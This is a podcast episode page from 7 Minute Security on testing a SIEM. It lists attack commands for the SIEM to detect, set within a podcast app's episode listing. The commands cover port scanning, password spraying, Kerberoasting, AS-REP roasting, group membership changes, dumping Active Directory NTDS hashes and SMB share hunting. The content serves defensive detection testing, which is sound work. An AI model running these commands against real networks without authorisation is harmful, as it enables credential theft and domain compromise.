7 Minute Security6 Jan 2023

7MS #554: Simple Ways to Test Your SIEM

Today we talk about Simple Ways to Test Your SIEM. Feel free to check out the YouTube version of this presentation, as well as our interview with Matt from Blumira for even more context, but here are the essential tools and commands covered:

Port scanning
nmap 10.0.7.0/24 - basic nmap scan
massscan -p1-65535,U:1-65535 --rate=1000 10.0.7.0/24 -v - scan all 65k+ TCP and UDP ports!

Password spraying
Rubeus.exe spray /password:Winter2022! /outfile:pwned.txt - try to log into all AD accounts one time with Winter2022! as the password, and save any pwned creds to pwned.txt

Kerberoasting and ASREPRoasting
rubeus.exe kerberoast /simple
rubeus asreproast /nowrap

Key group membership changes
net group "GROUP NAME" user-to-add-to-a-group /add

Dump Active Directory hashes
cme smb IP.OF.THE.DOMAINCONTROLLER -u user -p password --ntds --enabled
ntdsutil "ac i ntds" "ifm" "create full c:\dc-backup" q q

SMB share hunting
Invoke-HuntSMBShares -Threads 100 -OutputDirectory C:\output - SMB enumeration using PowerHuntShares

Upptäck Premium

Prova 14 dagar kostnadsfritt

Skaffa Premium

Avsnitt(714)

7MS #690: Tales of Pentest Pwnage – Part 74

Today's tale of pentest pwnage is a classic case of "If your head is buried in the pentest sand, pop it out for a while, touch grass, and re-enumerate what you've already enumerated, because that can ...

29 Aug 202521min

7MS #689: Pwning Ninja Hacker Academy – Part 2

Hello friends! Today your friend and mine, Joe "The Machine" Skeen joins me as we keep chipping away at pwning Ninja Hacker Academy! Today's pwnage includes: "Upgrading" our Sliver C2 connection to...

22 Aug 202515min

7MS #688: Building a Pentest Training Course Is Fun and Frustrating

Today I talk about a subject I love while also driving me crazy at the same time: building a pentest training course! Specifically, I dissect a fun/frustrating GPO attack that I need to build very car...

16 Aug 202522min

7MS #687: A Peek into the 7MS Mail Bag – Part 5

Hi friends, we're doing something today we haven't done in a hot minute: take a dip into the 7MinSec mail bag! Today we cover these questions: If I'm starting a solo business venture as a security co...

11 Aug 202557min

7MS #686: Our New Pentest Training Course is Almost Ready

Oh man, I'm so excited I can hardly sleep. Our new three-day (4 hours per day) training is getting closer to general release. I talk about the good/bad/ugly of putting together an attack-sensitive lab...

1 Aug 202523min

7MS #685: The Time My Neighbor Almost Got Scammed Out of $13K

Today's kind of a "story time with your friend Brian" episode: a tale of how my neighbor almost got scammed out of $13k. The story has a lot of red flags we can all keep in mind to keep ourselves (as...

25 Juli 202522min

7MS #684: Pwning Ninja Hacker Academy

Hey friends, today we start pwning Ninja Hacker Academy – cool CTF-style lab that has you start with no cred and try to conquer domain admin on two domains!

18 Juli 202522min

7MS #683: What I'm Working on This Week - Part 4

This week I'm working on a mixed bag of fun security and marketing things: A pentest I'm stuck on My latest lab CTF obsession: Ninja Hacker Academy A cool "about 7MinSec" marketing video that was rec...

12 Juli 202530min

Allt en och samma app

Lyssna på dina favoritpoddar och ljudböcker på ett och samma ställe.

Noga utvalt innehåll

Njut av handplockade tips som passar din smak – utan ändlöst scrollande.

Fortsätt när du vill

Fortsätt lyssna där du slutade – även offline.

Premium

99 kr/ månad

Tillgång till alla Premium-poddar
Reklamfritt premium-innehåll
Avsluta när du vill

Prova 14 dagar gratis

Premium

129 kr/ månad

Tillgång till alla Premium-poddar
Reklamfritt premium-innehåll
Avsluta när du vill
Ett extra konto

Prova 14 dagar gratis

Populärt inom Politik & nyheter

Berättelserna och rösterna du älskar att lyssna på

Obegränsad lyssning på alla dina favoritpoddar och ljudböcker

Upptäck Premium